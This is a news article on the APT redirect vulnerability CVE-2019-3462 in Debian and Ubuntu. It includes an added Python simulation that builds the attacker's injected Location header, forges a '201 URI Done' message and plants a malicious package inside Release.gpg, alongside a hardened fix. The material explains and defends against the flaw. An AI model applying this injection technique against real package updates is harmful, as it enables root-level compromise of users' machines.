Debian and Ubuntu, two of the most widely used Linux distributions, shipped a vulnerability in their main package-management tool that an attacker on the network could use to feed a victim a malicious package, which APT would then install with root privileges on the target machine.
The vulnerability (CVE-2019-3462) is in APT, the utility that downloads, verifies and installs software packages on Debian, Ubuntu and their derivatives. Researcher Max Justicz found that APT's HTTP transport mishandles redirects while fetching packages, and that an attacker positioned between the client and its mirror could exploit this to gain root on the victim's machine.
Several releases of Debian and Ubuntu are affected, and the maintainers of both distributions have published fixed packages. Ubuntu 18.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS and Ubuntu 14.04 LTS are all vulnerable. For Debian, the fix ships in APT version 1.4.9 for the stable (stretch) release.
“The code handling HTTP redirects in the HTTP transport method doesn't properly sanitize fields transmitted over the wire. This vulnerability could be used by an attacker located as a man-in-the-middle between APT and a mirror to inject malicious content in the HTTP connection,” the Debian advisory says.
“This content could then be recognized as a valid package by APT and used later for code execution with root privileges on the target machine.”
In his write-up, Justicz laid out a technique that an attacker with a man-in-the-middle position could use to get a malicious package installed on a vulnerable Debian system. The method relies on the fact that a specific file fetched during apt update is written to a predictable location on disk.
“In my proof of concept, because I chose to inject the 201 URI Done response right away, I had to deal with the fact that no package had actually been downloaded yet. I needed a way to get my malicious .deb onto the system for use in the Filename parameter,” Justicz wrote.
“To do this, I took advantage of the fact that the Release.gpg file pulled during apt update is both malleable and installed into a predictable location. Specifically, Release.gpg contains ASCII-armored PGP signatures...But apt’s signature validation process is totally fine with the presence of other garbage in that file, as long as it doesn’t touch the signatures. So I intercepted the Release.gpg response and prepended it with my malicious deb.”
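The two ingredients described above, the unsanitized redirect target and the malleable Release.gpg, can be modelled in a few dozen lines. The following is an added example, not code from the article or from apt itself: a simplified stand-in for apt's acquire-to-transport-method protocol, where a transport method reports a "103 Redirect" containing the server's Location header and later a "201 URI Done" carrying the file's path and hashes. All URLs, paths, hashes, file contents and the function names are constructed for illustration; the hardening (rejecting control characters in the redirect target) is one reasonable fix, not necessarily the exact change apt shipped.

```python
"""
Added example (not code from the article or from apt): a simplified model of
apt's acquire <-> transport-method protocol showing how an unsanitized
redirect Location lets a man-in-the-middle inject a forged '201 URI Done'
message, beside a hardened version that refuses it.
Every URL, path, hash and file body below is constructed sample data.
"""
import re
from typing import Dict, List, Tuple

Message = Tuple[int, str, Dict[str, str]]

# Constructed stand-ins for a .deb archive and the detached ASCII-armored
# signature that 'apt update' writes to /var/lib/apt/lists/.
MALICIOUS_DEB = b"!<arch>\nattacker-controlled package bytes\n"
RELEASE_GPG = (
    b"-----BEGIN PGP SIGNATURE-----\n"
    b"iQEzBAABCAAdFiEEexample\n"
    b"-----END PGP SIGNATURE-----\n"
)
PLANTED_PATH = "/var/lib/apt/lists/mirror.example_debian_dists_stable_Release.gpg"
TARGET_URI = "http://mirror.example/debian/pool/main/e/example/example_1.0_all.deb"
# Hashes apt expects for the genuine package; in practice they come from the
# signed Packages index, so the attacker can read them just as apt does.
EXPECTED = {"Size": "4242", "SHA256-Hash": "0" * 64}


def parse_messages(wire: str) -> List[Message]:
    """Wire format: '<code> <text>' plus 'Key: value' lines; a blank line ends a message."""
    messages: List[Message] = []
    for chunk in wire.split("\n\n"):
        lines = [ln for ln in chunk.split("\n") if ln]
        if not lines:
            continue
        code, _, text = lines[0].partition(" ")
        fields: Dict[str, str] = {}
        for ln in lines[1:]:
            key, _, value = ln.partition(": ")
            fields[key] = value
        messages.append((int(code), text, fields))
    return messages


def redirect_message_vulnerable(uri: str, location: str) -> str:
    """The flaw: the Location header value is copied into the wire message verbatim."""
    return f"103 Redirect\nURI: {uri}\nNew-URI: {location}\n\n"


def redirect_message_hardened(uri: str, location: str) -> str:
    """Refuse any redirect target that could end a line or a message (assumed fix)."""
    if re.search(r"[\x00-\x1f\x7f]", location):
        raise ValueError("redirect target contains control characters")
    return redirect_message_vulnerable(uri, location)


def craft_location(target_uri: str, expected: Dict[str, str], planted_path: str) -> str:
    """Attacker's Location header: a plausible URL, a blank line, then a forged
    '201 URI Done' whose Filename is the planted file and whose hashes are the
    ones apt already expects for the genuine package."""
    forged = ["201 URI Done", f"URI: {target_uri}", f"Filename: {planted_path}"]
    forged += [f"{k}: {v}" for k, v in expected.items()]
    return "http://mirror.example/redirect.deb\n\n" + "\n".join(forged)


def acquire_accepted_files(wire: str, expected_by_uri: Dict[str, Dict[str, str]]) -> List[str]:
    """Acquire side: on '201 URI Done' compare the hashes the method *reports*
    with the expected ones. Nothing is recomputed from the file on disk, so a
    forged 201 that echoes the expected hashes is accepted."""
    accepted: List[str] = []
    for code, _, fields in parse_messages(wire):
        if code != 201:
            continue
        expected = expected_by_uri.get(fields.get("URI", ""))
        if expected and all(fields.get(k) == v for k, v in expected.items()):
            accepted.append(fields["Filename"])
    return accepted


def armored_signatures(data: bytes) -> List[bytes]:
    """Stand-in for tolerant armor parsing: only BEGIN..END blocks are looked at,
    so bytes prepended to Release.gpg do not disturb the signature."""
    return re.findall(rb"-----BEGIN PGP SIGNATURE-----.*?-----END PGP SIGNATURE-----", data, re.S)


def run_attack(hardened: bool) -> List[str]:
    """Return the files the acquire side would treat as verified downloads."""
    location = craft_location(TARGET_URI, EXPECTED, PLANTED_PATH)
    build = redirect_message_hardened if hardened else redirect_message_vulnerable
    try:
        wire = build(TARGET_URI, location)
    except ValueError:
        return []
    return acquire_accepted_files(wire, {TARGET_URI: EXPECTED})


if __name__ == "__main__":
    planted = MALICIOUS_DEB + RELEASE_GPG
    assert armored_signatures(planted) == armored_signatures(RELEASE_GPG)
    print("vulnerable transport accepts:", run_attack(hardened=False))
    print("hardened transport accepts:  ", run_attack(hardened=True))
```

The point the model makes explicit is that the integrity check sits on the wrong side of a trust boundary: the acquire side compares hashes the transport method reports, and the redirect bug lets a network attacker speak as the transport method. Refusing control characters in the redirect target closes the injection; fetching over HTTPS removes the attacker's ability to tamper with the response in the first place.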
One of the foundational problems that makes this bug exploitable is that the default update sources deliver packages over plain HTTP rather than HTTPS. The packages and index files are signed, but signatures only help if the client's verification logic cannot be subverted; an attacker with a privileged network position can use a transport bug like this one to get a malicious package onto a victim's computer without ever breaking a signature. Justicz recommended that maintainers make HTTPS the default transport for updates to remove that network attacker from the picture.
“Yes, a malicious mirror could still exploit a bug like this, even with https. But I suspect that a network adversary serving an exploit is far more likely than deb.debian.org serving one or their TLS certificate getting compromised,” Justicz wrote.
“Supporting http is fine. I just think it’s worth making https repositories the default – the safer default – and allowing users to downgrade their security at a later time if they choose to do so.”